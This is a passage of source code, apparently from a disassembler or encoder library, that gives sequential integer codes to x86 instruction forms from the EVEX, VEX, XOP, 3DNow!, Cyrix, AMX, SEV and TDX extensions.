EVEX_VGETMANTPS_XMM_K1Z_XMMM128B32_IMM8: int = 3853
EVEX_VGETMANTPS_YMM_K1Z_YMMM256B32_IMM8: int = 3854
EVEX_VGETMANTPS_ZMM_K1Z_ZMMM512B32_IMM8_SAE: int = 3855
EVEX_VGETMANTPD_XMM_K1Z_XMMM128B64_IMM8: int = 3856
EVEX_VGETMANTPD_YMM_K1Z_YMMM256B64_IMM8: int = 3857
EVEX_VGETMANTPD_ZMM_K1Z_ZMMM512B64_IMM8_SAE: int = 3858
EVEX_VGETMANTSS_XMM_K1Z_XMM_XMMM32_IMM8_SAE: int = 3859
EVEX_VGETMANTSD_XMM_K1Z_XMM_XMMM64_IMM8_SAE: int = 3860
VEX_KSHIFTRB_KR_KR_IMM8: int = 3861
VEX_KSHIFTRW_KR_KR_IMM8: int = 3862
VEX_KSHIFTRD_KR_KR_IMM8: int = 3863
VEX_KSHIFTRQ_KR_KR_IMM8: int = 3864
VEX_KSHIFTLB_KR_KR_IMM8: int = 3865
VEX_KSHIFTLW_KR_KR_IMM8: int = 3866
VEX_KSHIFTLD_KR_KR_IMM8: int = 3867
VEX_KSHIFTLQ_KR_KR_IMM8: int = 3868
VEX_VINSERTI128_YMM_YMM_XMMM128_IMM8: int = 3869
EVEX_VINSERTI32X4_YMM_K1Z_YMM_XMMM128_IMM8: int = 3870
EVEX_VINSERTI32X4_ZMM_K1Z_ZMM_XMMM128_IMM8: int = 3871
EVEX_VINSERTI64X2_YMM_K1Z_YMM_XMMM128_IMM8: int = 3872
EVEX_VINSERTI64X2_ZMM_K1Z_ZMM_XMMM128_IMM8: int = 3873
VEX_VEXTRACTI128_XMMM128_YMM_IMM8: int = 3874
EVEX_VEXTRACTI32X4_XMMM128_K1Z_YMM_IMM8: int = 3875
EVEX_VEXTRACTI32X4_XMMM128_K1Z_ZMM_IMM8: int = 3876
EVEX_VEXTRACTI64X2_XMMM128_K1Z_YMM_IMM8: int = 3877
EVEX_VEXTRACTI64X2_XMMM128_K1Z_ZMM_IMM8: int = 3878
EVEX_VINSERTI32X8_ZMM_K1Z_ZMM_YMMM256_IMM8: int = 3879
EVEX_VINSERTI64X4_ZMM_K1Z_ZMM_YMMM256_IMM8: int = 3880
EVEX_VEXTRACTI32X8_YMMM256_K1Z_ZMM_IMM8: int = 3881
EVEX_VEXTRACTI64X4_YMMM256_K1Z_ZMM_IMM8: int = 3882
EVEX_VPCMPUB_KR_K1_XMM_XMMM128_IMM8: int = 3883
EVEX_VPCMPUB_KR_K1_YMM_YMMM256_IMM8: int = 3884
EVEX_VPCMPUB_KR_K1_ZMM_ZMMM512_IMM8: int = 3885
EVEX_VPCMPUW_KR_K1_XMM_XMMM128_IMM8: int = 3886
EVEX_VPCMPUW_KR_K1_YMM_YMMM256_IMM8: int = 3887
EVEX_VPCMPUW_KR_K1_ZMM_ZMMM512_IMM8: int = 3888
EVEX_VPCMPB_KR_K1_XMM_XMMM128_IMM8: int = 3889
EVEX_VPCMPB_KR_K1_YMM_YMMM256_IMM8: int = 3890
EVEX_VPCMPB_KR_K1_ZMM_ZMMM512_IMM8: int = 3891
EVEX_VPCMPW_KR_K1_XMM_XMMM128_IMM8: int = 3892
EVEX_VPCMPW_KR_K1_YMM_YMMM256_IMM8: int = 3893
EVEX_VPCMPW_KR_K1_ZMM_ZMMM512_IMM8: int = 3894
DPPS_XMM_XMMM128_IMM8: int = 3895
VEX_VDPPS_XMM_XMM_XMMM128_IMM8: int = 3896
VEX_VDPPS_YMM_YMM_YMMM256_IMM8: int = 3897
DPPD_XMM_XMMM128_IMM8: int = 3898
VEX_VDPPD_XMM_XMM_XMMM128_IMM8: int = 3899
MPSADBW_XMM_XMMM128_IMM8: int = 3900
VEX_VMPSADBW_XMM_XMM_XMMM128_IMM8: int = 3901
VEX_VMPSADBW_YMM_YMM_YMMM256_IMM8: int = 3902
EVEX_VDBPSADBW_XMM_K1Z_XMM_XMMM128_IMM8: int = 3903
EVEX_VDBPSADBW_YMM_K1Z_YMM_YMMM256_IMM8: int = 3904
EVEX_VDBPSADBW_ZMM_K1Z_ZMM_ZMMM512_IMM8: int = 3905
EVEX_VSHUFI32X4_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3906
EVEX_VSHUFI32X4_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 3907
EVEX_VSHUFI64X2_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3908
EVEX_VSHUFI64X2_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 3909
PCLMULQDQ_XMM_XMMM128_IMM8: int = 3910
VEX_VPCLMULQDQ_XMM_XMM_XMMM128_IMM8: int = 3911
VEX_VPCLMULQDQ_YMM_YMM_YMMM256_IMM8: int = 3912
EVEX_VPCLMULQDQ_XMM_XMM_XMMM128_IMM8: int = 3913
EVEX_VPCLMULQDQ_YMM_YMM_YMMM256_IMM8: int = 3914
EVEX_VPCLMULQDQ_ZMM_ZMM_ZMMM512_IMM8: int = 3915
VEX_VPERM2I128_YMM_YMM_YMMM256_IMM8: int = 3916
VEX_VPERMIL2PS_XMM_XMM_XMMM128_XMM_IMM4: int = 3917
VEX_VPERMIL2PS_YMM_YMM_YMMM256_YMM_IMM4: int = 3918
VEX_VPERMIL2PS_XMM_XMM_XMM_XMMM128_IMM4: int = 3919
VEX_VPERMIL2PS_YMM_YMM_YMM_YMMM256_IMM4: int = 3920
VEX_VPERMIL2PD_XMM_XMM_XMMM128_XMM_IMM4: int = 3921
VEX_VPERMIL2PD_YMM_YMM_YMMM256_YMM_IMM4: int = 3922
VEX_VPERMIL2PD_XMM_XMM_XMM_XMMM128_IMM4: int = 3923
VEX_VPERMIL2PD_YMM_YMM_YMM_YMMM256_IMM4: int = 3924
VEX_VBLENDVPS_XMM_XMM_XMMM128_XMM: int = 3925
VEX_VBLENDVPS_YMM_YMM_YMMM256_YMM: int = 3926
VEX_VBLENDVPD_XMM_XMM_XMMM128_XMM: int = 3927
VEX_VBLENDVPD_YMM_YMM_YMMM256_YMM: int = 3928
VEX_VPBLENDVB_XMM_XMM_XMMM128_XMM: int = 3929
VEX_VPBLENDVB_YMM_YMM_YMMM256_YMM: int = 3930
EVEX_VRANGEPS_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 3931
EVEX_VRANGEPS_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3932
EVEX_VRANGEPS_ZMM_K1Z_ZMM_ZMMM512B32_IMM8_SAE: int = 3933
EVEX_VRANGEPD_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 3934
EVEX_VRANGEPD_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3935
EVEX_VRANGEPD_ZMM_K1Z_ZMM_ZMMM512B64_IMM8_SAE: int = 3936
EVEX_VRANGESS_XMM_K1Z_XMM_XMMM32_IMM8_SAE: int = 3937
EVEX_VRANGESD_XMM_K1Z_XMM_XMMM64_IMM8_SAE: int = 3938
EVEX_VFIXUPIMMPS_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 3939
EVEX_VFIXUPIMMPS_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3940
EVEX_VFIXUPIMMPS_ZMM_K1Z_ZMM_ZMMM512B32_IMM8_SAE: int = 3941
EVEX_VFIXUPIMMPD_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 3942
EVEX_VFIXUPIMMPD_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3943
EVEX_VFIXUPIMMPD_ZMM_K1Z_ZMM_ZMMM512B64_IMM8_SAE: int = 3944
EVEX_VFIXUPIMMSS_XMM_K1Z_XMM_XMMM32_IMM8_SAE: int = 3945
EVEX_VFIXUPIMMSD_XMM_K1Z_XMM_XMMM64_IMM8_SAE: int = 3946
EVEX_VREDUCEPS_XMM_K1Z_XMMM128B32_IMM8: int = 3947
EVEX_VREDUCEPS_YMM_K1Z_YMMM256B32_IMM8: int = 3948
EVEX_VREDUCEPS_ZMM_K1Z_ZMMM512B32_IMM8_SAE: int = 3949
EVEX_VREDUCEPD_XMM_K1Z_XMMM128B64_IMM8: int = 3950
EVEX_VREDUCEPD_YMM_K1Z_YMMM256B64_IMM8: int = 3951
EVEX_VREDUCEPD_ZMM_K1Z_ZMMM512B64_IMM8_SAE: int = 3952
EVEX_VREDUCESS_XMM_K1Z_XMM_XMMM32_IMM8_SAE: int = 3953
EVEX_VREDUCESD_XMM_K1Z_XMM_XMMM64_IMM8_SAE: int = 3954
VEX_VFMADDSUBPS_XMM_XMM_XMMM128_XMM: int = 3955
VEX_VFMADDSUBPS_YMM_YMM_YMMM256_YMM: int = 3956
VEX_VFMADDSUBPS_XMM_XMM_XMM_XMMM128: int = 3957
VEX_VFMADDSUBPS_YMM_YMM_YMM_YMMM256: int = 3958
VEX_VFMADDSUBPD_XMM_XMM_XMMM128_XMM: int = 3959
VEX_VFMADDSUBPD_YMM_YMM_YMMM256_YMM: int = 3960
VEX_VFMADDSUBPD_XMM_XMM_XMM_XMMM128: int = 3961
VEX_VFMADDSUBPD_YMM_YMM_YMM_YMMM256: int = 3962
VEX_VFMSUBADDPS_XMM_XMM_XMMM128_XMM: int = 3963
VEX_VFMSUBADDPS_YMM_YMM_YMMM256_YMM: int = 3964
VEX_VFMSUBADDPS_XMM_XMM_XMM_XMMM128: int = 3965
VEX_VFMSUBADDPS_YMM_YMM_YMM_YMMM256: int = 3966
VEX_VFMSUBADDPD_XMM_XMM_XMMM128_XMM: int = 3967
VEX_VFMSUBADDPD_YMM_YMM_YMMM256_YMM: int = 3968
VEX_VFMSUBADDPD_XMM_XMM_XMM_XMMM128: int = 3969
VEX_VFMSUBADDPD_YMM_YMM_YMM_YMMM256: int = 3970
PCMPESTRM_XMM_XMMM128_IMM8: int = 3971
PCMPESTRM64_XMM_XMMM128_IMM8: int = 3972
VEX_VPCMPESTRM_XMM_XMMM128_IMM8: int = 3973
VEX_VPCMPESTRM64_XMM_XMMM128_IMM8: int = 3974
PCMPESTRI_XMM_XMMM128_IMM8: int = 3975
PCMPESTRI64_XMM_XMMM128_IMM8: int = 3976
VEX_VPCMPESTRI_XMM_XMMM128_IMM8: int = 3977
VEX_VPCMPESTRI64_XMM_XMMM128_IMM8: int = 3978
PCMPISTRM_XMM_XMMM128_IMM8: int = 3979
VEX_VPCMPISTRM_XMM_XMMM128_IMM8: int = 3980
PCMPISTRI_XMM_XMMM128_IMM8: int = 3981
VEX_VPCMPISTRI_XMM_XMMM128_IMM8: int = 3982
EVEX_VFPCLASSPS_KR_K1_XMMM128B32_IMM8: int = 3983
EVEX_VFPCLASSPS_KR_K1_YMMM256B32_IMM8: int = 3984
EVEX_VFPCLASSPS_KR_K1_ZMMM512B32_IMM8: int = 3985
EVEX_VFPCLASSPD_KR_K1_XMMM128B64_IMM8: int = 3986
EVEX_VFPCLASSPD_KR_K1_YMMM256B64_IMM8: int = 3987
EVEX_VFPCLASSPD_KR_K1_ZMMM512B64_IMM8: int = 3988
EVEX_VFPCLASSSS_KR_K1_XMMM32_IMM8: int = 3989
EVEX_VFPCLASSSD_KR_K1_XMMM64_IMM8: int = 3990
VEX_VFMADDPS_XMM_XMM_XMMM128_XMM: int = 3991
VEX_VFMADDPS_YMM_YMM_YMMM256_YMM: int = 3992
VEX_VFMADDPS_XMM_XMM_XMM_XMMM128: int = 3993
VEX_VFMADDPS_YMM_YMM_YMM_YMMM256: int = 3994
VEX_VFMADDPD_XMM_XMM_XMMM128_XMM: int = 3995
VEX_VFMADDPD_YMM_YMM_YMMM256_YMM: int = 3996
VEX_VFMADDPD_XMM_XMM_XMM_XMMM128: int = 3997
VEX_VFMADDPD_YMM_YMM_YMM_YMMM256: int = 3998
VEX_VFMADDSS_XMM_XMM_XMMM32_XMM: int = 3999
VEX_VFMADDSS_XMM_XMM_XMM_XMMM32: int = 4000
VEX_VFMADDSD_XMM_XMM_XMMM64_XMM: int = 4001
VEX_VFMADDSD_XMM_XMM_XMM_XMMM64: int = 4002
VEX_VFMSUBPS_XMM_XMM_XMMM128_XMM: int = 4003
VEX_VFMSUBPS_YMM_YMM_YMMM256_YMM: int = 4004
VEX_VFMSUBPS_XMM_XMM_XMM_XMMM128: int = 4005
VEX_VFMSUBPS_YMM_YMM_YMM_YMMM256: int = 4006
VEX_VFMSUBPD_XMM_XMM_XMMM128_XMM: int = 4007
VEX_VFMSUBPD_YMM_YMM_YMMM256_YMM: int = 4008
VEX_VFMSUBPD_XMM_XMM_XMM_XMMM128: int = 4009
VEX_VFMSUBPD_YMM_YMM_YMM_YMMM256: int = 4010
VEX_VFMSUBSS_XMM_XMM_XMMM32_XMM: int = 4011
VEX_VFMSUBSS_XMM_XMM_XMM_XMMM32: int = 4012
VEX_VFMSUBSD_XMM_XMM_XMMM64_XMM: int = 4013
VEX_VFMSUBSD_XMM_XMM_XMM_XMMM64: int = 4014
EVEX_VPSHLDW_XMM_K1Z_XMM_XMMM128_IMM8: int = 4015
EVEX_VPSHLDW_YMM_K1Z_YMM_YMMM256_IMM8: int = 4016
EVEX_VPSHLDW_ZMM_K1Z_ZMM_ZMMM512_IMM8: int = 4017
EVEX_VPSHLDD_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 4018
EVEX_VPSHLDD_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 4019
EVEX_VPSHLDD_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 4020
EVEX_VPSHLDQ_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 4021
EVEX_VPSHLDQ_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 4022
EVEX_VPSHLDQ_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 4023
EVEX_VPSHRDW_XMM_K1Z_XMM_XMMM128_IMM8: int = 4024
EVEX_VPSHRDW_YMM_K1Z_YMM_YMMM256_IMM8: int = 4025
EVEX_VPSHRDW_ZMM_K1Z_ZMM_ZMMM512_IMM8: int = 4026
EVEX_VPSHRDD_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 4027
EVEX_VPSHRDD_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 4028
EVEX_VPSHRDD_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 4029
EVEX_VPSHRDQ_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 4030
EVEX_VPSHRDQ_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 4031
EVEX_VPSHRDQ_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 4032
VEX_VFNMADDPS_XMM_XMM_XMMM128_XMM: int = 4033
VEX_VFNMADDPS_YMM_YMM_YMMM256_YMM: int = 4034
VEX_VFNMADDPS_XMM_XMM_XMM_XMMM128: int = 4035
VEX_VFNMADDPS_YMM_YMM_YMM_YMMM256: int = 4036
VEX_VFNMADDPD_XMM_XMM_XMMM128_XMM: int = 4037
VEX_VFNMADDPD_YMM_YMM_YMMM256_YMM: int = 4038
VEX_VFNMADDPD_XMM_XMM_XMM_XMMM128: int = 4039
VEX_VFNMADDPD_YMM_YMM_YMM_YMMM256: int = 4040
VEX_VFNMADDSS_XMM_XMM_XMMM32_XMM: int = 4041
VEX_VFNMADDSS_XMM_XMM_XMM_XMMM32: int = 4042
VEX_VFNMADDSD_XMM_XMM_XMMM64_XMM: int = 4043
VEX_VFNMADDSD_XMM_XMM_XMM_XMMM64: int = 4044
VEX_VFNMSUBPS_XMM_XMM_XMMM128_XMM: int = 4045
VEX_VFNMSUBPS_YMM_YMM_YMMM256_YMM: int = 4046
VEX_VFNMSUBPS_XMM_XMM_XMM_XMMM128: int = 4047
VEX_VFNMSUBPS_YMM_YMM_YMM_YMMM256: int = 4048
VEX_VFNMSUBPD_XMM_XMM_XMMM128_XMM: int = 4049
VEX_VFNMSUBPD_YMM_YMM_YMMM256_YMM: int = 4050
VEX_VFNMSUBPD_XMM_XMM_XMM_XMMM128: int = 4051
VEX_VFNMSUBPD_YMM_YMM_YMM_YMMM256: int = 4052
VEX_VFNMSUBSS_XMM_XMM_XMMM32_XMM: int = 4053
VEX_VFNMSUBSS_XMM_XMM_XMM_XMMM32: int = 4054
VEX_VFNMSUBSD_XMM_XMM_XMMM64_XMM: int = 4055
VEX_VFNMSUBSD_XMM_XMM_XMM_XMMM64: int = 4056
SHA1RNDS4_XMM_XMMM128_IMM8: int = 4057
GF2P8AFFINEQB_XMM_XMMM128_IMM8: int = 4058
VEX_VGF2P8AFFINEQB_XMM_XMM_XMMM128_IMM8: int = 4059
VEX_VGF2P8AFFINEQB_YMM_YMM_YMMM256_IMM8: int = 4060
EVEX_VGF2P8AFFINEQB_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 4061
EVEX_VGF2P8AFFINEQB_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 4062
EVEX_VGF2P8AFFINEQB_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 4063
GF2P8AFFINEINVQB_XMM_XMMM128_IMM8: int = 4064
VEX_VGF2P8AFFINEINVQB_XMM_XMM_XMMM128_IMM8: int = 4065
VEX_VGF2P8AFFINEINVQB_YMM_YMM_YMMM256_IMM8: int = 4066
EVEX_VGF2P8AFFINEINVQB_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 4067
EVEX_VGF2P8AFFINEINVQB_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 4068
EVEX_VGF2P8AFFINEINVQB_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 4069
AESKEYGENASSIST_XMM_XMMM128_IMM8: int = 4070
VEX_VAESKEYGENASSIST_XMM_XMMM128_IMM8: int = 4071
VEX_RORX_R32_RM32_IMM8: int = 4072
VEX_RORX_R64_RM64_IMM8: int = 4073
XOP_VPMACSSWW_XMM_XMM_XMMM128_XMM: int = 4074
XOP_VPMACSSWD_XMM_XMM_XMMM128_XMM: int = 4075
XOP_VPMACSSDQL_XMM_XMM_XMMM128_XMM: int = 4076
XOP_VPMACSSDD_XMM_XMM_XMMM128_XMM: int = 4077
XOP_VPMACSSDQH_XMM_XMM_XMMM128_XMM: int = 4078
XOP_VPMACSWW_XMM_XMM_XMMM128_XMM: int = 4079
XOP_VPMACSWD_XMM_XMM_XMMM128_XMM: int = 4080
XOP_VPMACSDQL_XMM_XMM_XMMM128_XMM: int = 4081
XOP_VPMACSDD_XMM_XMM_XMMM128_XMM: int = 4082
XOP_VPMACSDQH_XMM_XMM_XMMM128_XMM: int = 4083
XOP_VPCMOV_XMM_XMM_XMMM128_XMM: int = 4084
XOP_VPCMOV_YMM_YMM_YMMM256_YMM: int = 4085
XOP_VPCMOV_XMM_XMM_XMM_XMMM128: int = 4086
XOP_VPCMOV_YMM_YMM_YMM_YMMM256: int = 4087
XOP_VPPERM_XMM_XMM_XMMM128_XMM: int = 4088
XOP_VPPERM_XMM_XMM_XMM_XMMM128: int = 4089
XOP_VPMADCSSWD_XMM_XMM_XMMM128_XMM: int = 4090
XOP_VPMADCSWD_XMM_XMM_XMMM128_XMM: int = 4091
XOP_VPROTB_XMM_XMMM128_IMM8: int = 4092
XOP_VPROTW_XMM_XMMM128_IMM8: int = 4093
XOP_VPROTD_XMM_XMMM128_IMM8: int = 4094
XOP_VPROTQ_XMM_XMMM128_IMM8: int = 4095
XOP_VPCOMB_XMM_XMM_XMMM128_IMM8: int = 4096
XOP_VPCOMW_XMM_XMM_XMMM128_IMM8: int = 4097
XOP_VPCOMD_XMM_XMM_XMMM128_IMM8: int = 4098
XOP_VPCOMQ_XMM_XMM_XMMM128_IMM8: int = 4099
XOP_VPCOMUB_XMM_XMM_XMMM128_IMM8: int = 4100
XOP_VPCOMUW_XMM_XMM_XMMM128_IMM8: int = 4101
XOP_VPCOMUD_XMM_XMM_XMMM128_IMM8: int = 4102
XOP_VPCOMUQ_XMM_XMM_XMMM128_IMM8: int = 4103
XOP_BLCFILL_R32_RM32: int = 4104
XOP_BLCFILL_R64_RM64: int = 4105
XOP_BLSFILL_R32_RM32: int = 4106
XOP_BLSFILL_R64_RM64: int = 4107
XOP_BLCS_R32_RM32: int = 4108
XOP_BLCS_R64_RM64: int = 4109
XOP_TZMSK_R32_RM32: int = 4110
XOP_TZMSK_R64_RM64: int = 4111
XOP_BLCIC_R32_RM32: int = 4112
XOP_BLCIC_R64_RM64: int = 4113
XOP_BLSIC_R32_RM32: int = 4114
XOP_BLSIC_R64_RM64: int = 4115
XOP_T1MSKC_R32_RM32: int = 4116
XOP_T1MSKC_R64_RM64: int = 4117
XOP_BLCMSK_R32_RM32: int = 4118
XOP_BLCMSK_R64_RM64: int = 4119
XOP_BLCI_R32_RM32: int = 4120
XOP_BLCI_R64_RM64: int = 4121
XOP_LLWPCB_R32: int = 4122
XOP_LLWPCB_R64: int = 4123
XOP_SLWPCB_R32: int = 4124
XOP_SLWPCB_R64: int = 4125
XOP_VFRCZPS_XMM_XMMM128: int = 4126
XOP_VFRCZPS_YMM_YMMM256: int = 4127
XOP_VFRCZPD_XMM_XMMM128: int = 4128
XOP_VFRCZPD_YMM_YMMM256: int = 4129
XOP_VFRCZSS_XMM_XMMM32: int = 4130
XOP_VFRCZSD_XMM_XMMM64: int = 4131
XOP_VPROTB_XMM_XMMM128_XMM: int = 4132
XOP_VPROTB_XMM_XMM_XMMM128: int = 4133
XOP_VPROTW_XMM_XMMM128_XMM: int = 4134
XOP_VPROTW_XMM_XMM_XMMM128: int = 4135
XOP_VPROTD_XMM_XMMM128_XMM: int = 4136
XOP_VPROTD_XMM_XMM_XMMM128: int = 4137
XOP_VPROTQ_XMM_XMMM128_XMM: int = 4138
XOP_VPROTQ_XMM_XMM_XMMM128: int = 4139
XOP_VPSHLB_XMM_XMMM128_XMM: int = 4140
XOP_VPSHLB_XMM_XMM_XMMM128: int = 4141
XOP_VPSHLW_XMM_XMMM128_XMM: int = 4142
XOP_VPSHLW_XMM_XMM_XMMM128: int = 4143
XOP_VPSHLD_XMM_XMMM128_XMM: int = 4144
XOP_VPSHLD_XMM_XMM_XMMM128: int = 4145
XOP_VPSHLQ_XMM_XMMM128_XMM: int = 4146
XOP_VPSHLQ_XMM_XMM_XMMM128: int = 4147
XOP_VPSHAB_XMM_XMMM128_XMM: int = 4148
XOP_VPSHAB_XMM_XMM_XMMM128: int = 4149
XOP_VPSHAW_XMM_XMMM128_XMM: int = 4150
XOP_VPSHAW_XMM_XMM_XMMM128: int = 4151
XOP_VPSHAD_XMM_XMMM128_XMM: int = 4152
XOP_VPSHAD_XMM_XMM_XMMM128: int = 4153
XOP_VPSHAQ_XMM_XMMM128_XMM: int = 4154
XOP_VPSHAQ_XMM_XMM_XMMM128: int = 4155
XOP_VPHADDBW_XMM_XMMM128: int = 4156
XOP_VPHADDBD_XMM_XMMM128: int = 4157
XOP_VPHADDBQ_XMM_XMMM128: int = 4158
XOP_VPHADDWD_XMM_XMMM128: int = 4159
XOP_VPHADDWQ_XMM_XMMM128: int = 4160
XOP_VPHADDDQ_XMM_XMMM128: int = 4161
XOP_VPHADDUBW_XMM_XMMM128: int = 4162
XOP_VPHADDUBD_XMM_XMMM128: int = 4163
XOP_VPHADDUBQ_XMM_XMMM128: int = 4164
XOP_VPHADDUWD_XMM_XMMM128: int = 4165
XOP_VPHADDUWQ_XMM_XMMM128: int = 4166
XOP_VPHADDUDQ_XMM_XMMM128: int = 4167
XOP_VPHSUBBW_XMM_XMMM128: int = 4168
XOP_VPHSUBWD_XMM_XMMM128: int = 4169
XOP_VPHSUBDQ_XMM_XMMM128: int = 4170
XOP_BEXTR_R32_RM32_IMM32: int = 4171
XOP_BEXTR_R64_RM64_IMM32: int = 4172
XOP_LWPINS_R32_RM32_IMM32: int = 4173
XOP_LWPINS_R64_RM32_IMM32: int = 4174
XOP_LWPVAL_R32_RM32_IMM32: int = 4175
XOP_LWPVAL_R64_RM32_IMM32: int = 4176
D3NOW_PI2FW_MM_MMM64: int = 4177
D3NOW_PI2FD_MM_MMM64: int = 4178
D3NOW_PF2IW_MM_MMM64: int = 4179
D3NOW_PF2ID_MM_MMM64: int = 4180
D3NOW_PFRCPV_MM_MMM64: int = 4181
D3NOW_PFRSQRTV_MM_MMM64: int = 4182
D3NOW_PFNACC_MM_MMM64: int = 4183
D3NOW_PFPNACC_MM_MMM64: int = 4184
D3NOW_PFCMPGE_MM_MMM64: int = 4185
D3NOW_PFMIN_MM_MMM64: int = 4186
D3NOW_PFRCP_MM_MMM64: int = 4187
D3NOW_PFRSQRT_MM_MMM64: int = 4188
D3NOW_PFSUB_MM_MMM64: int = 4189
D3NOW_PFADD_MM_MMM64: int = 4190
D3NOW_PFCMPGT_MM_MMM64: int = 4191
D3NOW_PFMAX_MM_MMM64: int = 4192
D3NOW_PFRCPIT1_MM_MMM64: int = 4193
D3NOW_PFRSQIT1_MM_MMM64: int = 4194
D3NOW_PFSUBR_MM_MMM64: int = 4195
D3NOW_PFACC_MM_MMM64: int = 4196
D3NOW_PFCMPEQ_MM_MMM64: int = 4197
D3NOW_PFMUL_MM_MMM64: int = 4198
D3NOW_PFRCPIT2_MM_MMM64: int = 4199
D3NOW_PMULHRW_MM_MMM64: int = 4200
D3NOW_PSWAPD_MM_MMM64: int = 4201
D3NOW_PAVGUSB_MM_MMM64: int = 4202
RMPADJUST: int = 4203
RMPUPDATE: int = 4204
PSMASH: int = 4205
PVALIDATEW: int = 4206
PVALIDATED: int = 4207
PVALIDATEQ: int = 4208
SERIALIZE: int = 4209
XSUSLDTRK: int = 4210
XRESLDTRK: int = 4211
INVLPGBW: int = 4212
INVLPGBD: int = 4213
INVLPGBQ: int = 4214
TLBSYNC: int = 4215
PREFETCHRESERVED3_M8: int = 4216
PREFETCHRESERVED4_M8: int = 4217
PREFETCHRESERVED5_M8: int = 4218
PREFETCHRESERVED6_M8: int = 4219
PREFETCHRESERVED7_M8: int = 4220
UD0: int = 4221
VMGEXIT: int = 4222
GETSECQ: int = 4223
VEX_LDTILECFG_M512: int = 4224
VEX_TILERELEASE: int = 4225
VEX_STTILECFG_M512: int = 4226
VEX_TILEZERO_TMM: int = 4227
VEX_TILELOADDT1_TMM_SIBMEM: int = 4228
VEX_TILESTORED_SIBMEM_TMM: int = 4229
VEX_TILELOADD_TMM_SIBMEM: int = 4230
VEX_TDPBF16PS_TMM_TMM_TMM: int = 4231
VEX_TDPBUUD_TMM_TMM_TMM: int = 4232
VEX_TDPBUSD_TMM_TMM_TMM: int = 4233
VEX_TDPBSUD_TMM_TMM_TMM: int = 4234
VEX_TDPBSSD_TMM_TMM_TMM: int = 4235
FNSTDW_AX: int = 4236
FNSTSG_AX: int = 4237
RDSHR_RM32: int = 4238
WRSHR_RM32: int = 4239
SMINT: int = 4240
DMINT: int = 4241
RDM: int = 4242
SVDC_M80_SREG: int = 4243
RSDC_SREG_M80: int = 4244
SVLDT_M80: int = 4245
RSLDT_M80: int = 4246
SVTS_M80: int = 4247
RSTS_M80: int = 4248
SMINT_0F7E: int = 4249
BB0_RESET: int = 4250
BB1_RESET: int = 4251
CPU_WRITE: int = 4252
CPU_READ: int = 4253
ALTINST: int = 4254
PAVEB_MM_MMM64: int = 4255
PADDSIW_MM_MMM64: int = 4256
PMAGW_MM_MMM64: int = 4257
PDISTIB_MM_M64: int = 4258
PSUBSIW_MM_MMM64: int = 4259
PMVZB_MM_M64: int = 4260
PMULHRW_MM_MMM64: int = 4261
PMVNZB_MM_M64: int = 4262
PMVLZB_MM_M64: int = 4263
PMVGEZB_MM_M64: int = 4264
PMULHRIW_MM_MMM64: int = 4265
PMACHRIW_MM_M64: int = 4266
CYRIX_D9D7: int = 4267
CYRIX_D9E2: int = 4268
FTSTP: int = 4269
CYRIX_D9E7: int = 4270
FRINT2: int = 4271
FRICHOP: int = 4272
CYRIX_DED8: int = 4273
CYRIX_DEDA: int = 4274
CYRIX_DEDC: int = 4275
CYRIX_DEDD: int = 4276
CYRIX_DEDE: int = 4277
FRINEAR: int = 4278
TDCALL: int = 4279
SEAMRET: int = 4280
SEAMOPS: int = 4281
SEAMCALL: int = 4282
AESENCWIDE128KL_M384: int = 4283
AESDECWIDE128KL_M384: int = 4284
AESENCWIDE256KL_M512: int = 4285
AESDECWIDE256KL_M512: int = 4286
LOADIWKEY_XMM_XMM: int = 4287
AESENC128KL_XMM_M384: int = 4288
AESDEC128KL_XMM_M384: int = 4289
AESENC256KL_XMM_M512: int = 4290
AESDEC256KL_XMM_M512: int = 4291
ENCODEKEY128_R32_R32: int = 4292
ENCODEKEY256_R32_R32: int = 4293
VEX_VBROADCASTSS_XMM_XMM: int = 4294
VEX_VBROADCASTSS_YMM_XMM: int = 4295
VEX_VBROADCASTSD_YMM_XMM: int = 4296
VMGEXIT_F2: int = 4297
UIRET: int = 4298
TESTUI: int = 4299
CLUI: int = 4300
STUI: int = 4301
SENDUIPI_R64: int = 4302
HRESET_IMM8: int = 4303
VEX_VPDPBUSD_XMM_XMM_XMMM128: int = 4304
VEX_VPDPBUSD_YMM_YMM_YMMM256: int = 4305
VEX_VPDPBUSDS_XMM_XMM_XMMM128: int = 4306
VEX_VPDPBUSDS_YMM_YMM_YMMM256: int = 4307
VEX_VPDPWSSD_XMM_XMM_XMMM128: int = 4308
VEX_VPDPWSSD_YMM_YMM_YMMM256: int = 4309
VEX_VPDPWSSDS_XMM_XMM_XMMM128: int = 4310
VEX_VPDPWSSDS_YMM_YMM_YMMM256: int = 4311
CCS_HASH_16: int = 4312
CCS_HASH_32: int = 4313
CCS_HASH_64: int = 4314
CCS_ENCRYPT_16: int = 4315
CCS_ENCRYPT_32: int = 4316
CCS_ENCRYPT_64: int = 4317
LKGS_RM16: int = 4318
LKGS_R32M16: int = 4319
LKGS_R64M16: int = 4320
ERETU: int = 4321
ERETS: int = 4322
